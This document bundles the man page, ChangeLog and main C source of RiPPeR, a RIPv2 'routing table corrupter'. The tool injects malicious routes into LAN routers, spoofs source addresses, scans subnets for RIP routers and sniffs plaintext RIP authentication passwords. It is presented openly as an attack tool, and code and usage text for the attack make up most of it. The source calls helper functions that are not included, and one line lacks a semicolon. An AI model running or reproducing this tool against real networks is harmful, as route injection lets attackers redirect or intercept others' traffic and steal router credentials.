ripper.8
..
.TH RiPPeR "8" "20030120" "RiPPeR 1.1-beta"
.SH NAME
.B RiPPeR 1.1-beta \- Routing Table Corrupter 

.SH SYNOPSIS
.B ripper [-r route] [-m metric] [-g gateway] [-n netmask] [-i interface] [-s spoofed address] [-dfch]

.SH DESCRIPTION
RiPPeR is a RIPv2 routing table corrupter. It can inject evil routes on a 
selected router in LAN environment and can also check if they have been 
injected correctly. RiPPeR offers the possibility to spoof the source 
address but with some restrictions, read the README for more informations. 
In general RiPPeR pretends to be a full-featured RIPv2 routing daemon.

.TP
Read README for informations about special cases.
.PP
.SH OPTIONS
.TP
\fB\-b <subnet>\fE
Scan a subnet searching for RIPv2 host. This option is to be used with
the following format: subnet/prefix
.br
Example: 192.168.0.0/24
.br
.TP
\fB\-r <route>\fR
Select the route to inject. This argument is mandatory if you don't use
-a option.
.br
.TP
\fB\-a\fR
This will inject routes read in file passed as argument. This file is generated
using routemake.
.br
.TP
\fB\-m <metric>\fR
Set the metric associated with the route. This argument is mandatory if
you don't specify -a option.
.br
.TP
\fB\-g <gateway>\fR
Set the default gateway for the route. Default is local machine. 
.br
.TP
\fB\-n <netmask>\fR
Set the netmask associated with the route. Default is 255.255.255.0.
.br
.TP
\fB\-s <spoofed address>\fR
Send packets from a spoofed address. Read the README before using this
options. This argument is optional.
.br
.TP
\fB\-i <interface>\fR
Select the interface. Default is eth0. 
.br
.TP
\fB\-d\fR
Run as a daemon. This argumets override -c.
.br
.TP
\fB\-f\fR
Force. Normal execution of the tool checks if your box is able to forward
packets, becouse if it is not able, the attack won't work. If you specify
this option you force the program not to check packet forwarding.
Read README for more informations.
.br
.TP
\fB\-c\fR
Check Route. Check if the route has been injected correctly. This option
is overriden by -d.
.br
.TP
\fB\-h\fR
Shows help.
.br

.SH PLATFORMS
Linux 2.0.x  2.2.x  2.4.x
.PP

.SH AVAILABILITY
Official web site: http://www.spine-group.org
.PP

.SH KNOW BUGS
- No known bugs. 

Please report bugs to authors
.PP

.SH AUTHORS
mydecay <mydecay@spine-group.org>
.br
click <click@spine-group.org>
.PP

.SH LICENSE
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
See COPYING for details.


ChangeLog
From 1.0-beta to 1.1-beta

1] Features Modifications:

-- Added subnet scan to find RIPv2 routers
-- Added the possibility to inject multiple routes

2] Code Modifications:

-- Converted all the code from standard socket programming
   to libpcap and libnet. 

-- Some minor modifications

3] Misc Changes:

-- routemake(8) will be shipped with RiPPeR. It generates route.conf.


ripper.c
#include "fibc.h"
#include "flags.h"

static struct neo_options opt[] = {
  {'-', 0, 0, NULL, "type:"},
  {'a', required_argument, "a/xarbng", "file", "read routes from this file"},
  {'r', required_argument, "r/xarb", "route", "route to inject"},
  {'b', required_argument, "b/xarbng", "subnet", "subnet to scan"},
  {'n', required_argument, "rn/xrnab", "netmask", "netmask of the route"},
  {'g', required_argument, "rg/rxgab", "gateway", "default gateway"},
  {'e', required_argument, "e/exb", "remote", "remote peer"},
  {'m', required_argument, "rm/rmxab", "metric", "metric to the route"},
  {'s', required_argument, NULL, "address", "spoofed source"},
  {'p', required_argument, NULL, "passwd", "password for autentication"},
  {'+', 0, "s|ar", 0, 0},
  {'N', no_argument, NULL, NULL, "ncurses mode"},
  {'x', no_argument, "x/xarbngd", "sniff", "sniff plain text password"},
  {'h', no_argument, NULL, NULL, "print help"},
  {'d', no_argument, "d/dc", NULL, "daemonize"},
  {'c', no_argument, "c/cd", NULL, "check injection"}, 
  {'+', 0, "|Narbx", 0, 0},
  {0, 0, 0, 0, 0}
};

int
main (int argc, char **argv)
{
  unsigned long sp00f = 0;
  char ch;
  pthread_t pt, pt1;

  credits ();
  init_all ();
  if (argc < 2) usage(argv[0]);
  
  neo_getopt (argc, argv, opt, OPT_NOW);
  while ((ch = neo_getopt (argc, argv, opt, OPT_DELAYED)) != EOF)
    {
      switch (ch)
	{
	case 'b':
	  strncpy (n_net, neoptarg, 19);
	  flags ^= SCAN;
	  break;
	case 'x':
	  flags ^= SNIFF;
	  break;
	case 's':
	  sp00f = inet_addr (neoptarg);
	  flags ^= SPOOF;
	  break;
	case 'p':
	  strncpy (password, neoptarg, 16);
	  flags ^= PASS;
	  break;
	case 'e':
	  strncpy(rip_group, neoptarg, 16);
	  break;
	case 'r':
	  routes[0][0] = inet_addr (neoptarg);
	  break;
	case 'm':
	  routes[3][0] = inet_addr (neoptarg);
	  break;
	case 'g':
	  routes[2][0] = inet_addr (neoptarg);
	  break;
	case 'n':
	  routes[1][0] = inet_addr (neoptarg);
	  break;
	case 'a':
	  printf ("Reading file %s...\n\n", neoptarg);
	  rip_file_read (neoptarg);
	  break;
	case 'h':
	  flags ^= N_MODE;
	  //usage (argv[0]);
	  break;
	case 'd':
	  flags ^= DAEMON;
	  break;
	case 'c':
	  flags ^= CHECK;
	  break;
	case 'N':
#ifdef HAVE_LIBNCURSES
	  flags ^= N_MODE;
	  graph=1;
#else
	  graph=0;
	  printf("You have not the ncurses support,if you want it\n");
	  printf("you have to download the library and recompile RIPper\n");
	  return -1
#endif
	    break;
	}
    }
   
  if(flags & N_MODE) return main_graph();	

  if (flags & SCAN)
    {
      n_print ("princ",1,2,"\e[0;31m\tScanner Mode Enabled.\e[0m\n\n");
      n_print ("princ",2,2,"** press ^c to exit **\n\n");
      scan_net (n_net);
      exit (0);
    }
 
  if (flags & DAEMON)
    {
        n_print ("princ",1,2,"\e[0;31m\tWorking in Daemon Mode.\e[0m\n\n");
	if (fork ())
	exit (0);
    }
  else
    n_print ("princ",1,2,"\tPress 'q' and Enter to exit\n\n");

  if (flags & SPOOF) //nella versione n_menu nn ce ne' bisgono!!
    localaddr = sp00f;
  
  if (flags & PASS)
    {
        if (flags & CHECK) n_print ("princ",1,2,"\e[0;31m\tPacket Injection Encrypted Mode With Checks Entered.\e[0m\n\n");
	if (pthread_create (&pt, NULL, (void *) auth_pass, NULL))
	fatal ("Cannot create pthread!\n\n");
    }
  if (flags & SNIFF)
    {
      n_print ("princ2",1,2,"\e[0;31m\tSniffer Password Mode Enabled.\e[0m\n\n");
      if (pthread_create (&pt, NULL, (void *) sniff_passwd, NULL))
      fatal ("Cannot create pthread!\n\n");
    }
  else
    {
	if (flags & CHECK) n_print ("princ",1,2,"\e[0;31m\tPacket Injection Mode With Checks Entered.\e[0m\n\n");
	else n_print ("princ",1,2,"\e[0;31m\tPacket Injection Mode Entered.\e[0m\n\n");	
	if (pthread_create (&pt, NULL, (void *) send_fake_rip_response, NULL))
	fatal ("Cannot create pthread!\n\n");
    }
  if (flags & CHECK)
    {
      if (flags & PASS)
	{
	  if (pthread_create (&pt1, NULL, (void *) check_injection_crypt, NULL))
	    {
	      fprintf (stderr, "\nerror while creating the pthread\n");
	      pthread_cancel (pt);
	      pthread_join (pt, NULL);
	      exit (1);
	    }
	}
      else
	{
	  if (pthread_create (&pt1, NULL, (void *) check_injection, NULL))
	    {
	      fprintf (stderr, "\nerror while creating the pthread\n");
	      pthread_cancel (pt);
	      pthread_join (pt, NULL);
	      exit (1);
	    }
	}
    }
  while ((char) getchar () != 'q');

  fprintf (stderr, "\nExiting...\n");
  pthread_cancel (pt);
  pthread_join (pt, NULL);
  if (flags & CHECK)
    {
      pthread_cancel (pt1);
      pthread_join (pt1, NULL);
    }

  return 0;
}
